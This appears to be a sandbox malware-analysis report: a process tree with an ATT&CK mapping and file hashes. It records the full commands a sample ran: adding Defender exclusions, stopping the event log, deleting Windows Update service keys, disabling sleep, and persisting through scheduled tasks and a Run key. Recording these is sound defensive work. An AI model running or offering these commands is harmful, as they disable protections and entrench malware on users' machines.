C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:268
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WAGDKRVZ"4⤵
- Launches sc.exe
PID:376
-
-
-
C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe"C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1508
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:2936
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:1728
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:1740
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:1760
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:2272
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:2648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:2288
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3012
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Barac5⤵PID:1968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe"C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2740
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1928
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1095366276869024868-2119681972349881035-336435787992728310-269971531-209500190"1⤵PID:1312
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "26851910118321128751620390806-231183534-1380072445658495179-2051987523-278575547"1⤵PID:1192
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10156249691574749117-1327706937-1767920576-4564921895544616082065593783-2130926281"1⤵PID:2380
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2011424703-619716270-2018466897649570822-1287893941-4863467951250057571036926201"1⤵PID:2912
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11064228651403314333130496686416597961862127259495-6133028641428023888-672822502"1⤵PID:2488
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-97001561627071377994824058-287122401-2024840508-114485273211859219992114031039"1⤵PID:1724
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
502KB
MD5ea001f076677c9b0dd774ae670efdf63
SHA137a4466f3c38b60a30fc1073b9d0b2d2d0e692e5
SHA25619fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100
SHA5126d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AUXU8PTGXJTT8TQ4QBG6.temp
Filesize7KB
MD5112918326bbfcf968dce29fb10c6e9f3
SHA1afc3f0574fedf79c2431efa1792953a3bd64c623
SHA2564203b7ca0563f08b7fc14ea0db1adeff7ec9652c0737af56051ca31f636ff545
SHA512a3a414a999c41ba817d6f16da373f85165d54193734a38378bfa7d347f9063f22a86a787c40c6c99c5d2e05b8755f92930e52b6a537c721c7d1609f372ec80b2
-
Filesize
1KB
MD5468a3efbeb430dea9c9319d258e62a43
SHA1f1f168dcd319053b9939959fe625c0df523cb3de
SHA2564ff65f03c93ab65a83516806d09bc47bf0dde8f38a112eee8185aaf846533836
SHA512ed59fbcae9f1e8f155be11eb379a5c756cb442320a116006a9ce045a067f88ef41a566335f5cdb569f99b3e6a22b09e7bfd4e6449924749f6ab37bf692bc69cd
-
Filesize
1KB
MD5852366aba34d23d447de037e7314468c
SHA1f443471094c51e2a72475339c64eae02b28d8ad8
SHA256299c704b02d4b39b4f253e90d8045ebfb999eadbbdd7e39e37fb81acf85d00b8
SHA512c33f055e07a94059b42e2474b0c3b572d1213882184564039922038250c27b4222db2d9e674d6452e1fd18544731e7c12e0004683503e19ea001fd505b0e3f1d
-
Filesize
2.4MB
MD5b70a5e7260b025e39b8016523a1f2d64
SHA1aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7
SHA256fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490
SHA512a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca
-
Filesize
2.7MB
MD5952f360a4651f948be3a673178631641
SHA160e58b89cfce587aa121baf431d55cbbecd21545
SHA256a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8
SHA512af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0
-
Filesize
2.4MB
MD58e40252356a6fb3f8f52d1effa2c2c3c
SHA13bf5461b591a53dcb48ea2dc6535cd90aa786c4e
SHA256de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a
SHA512c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a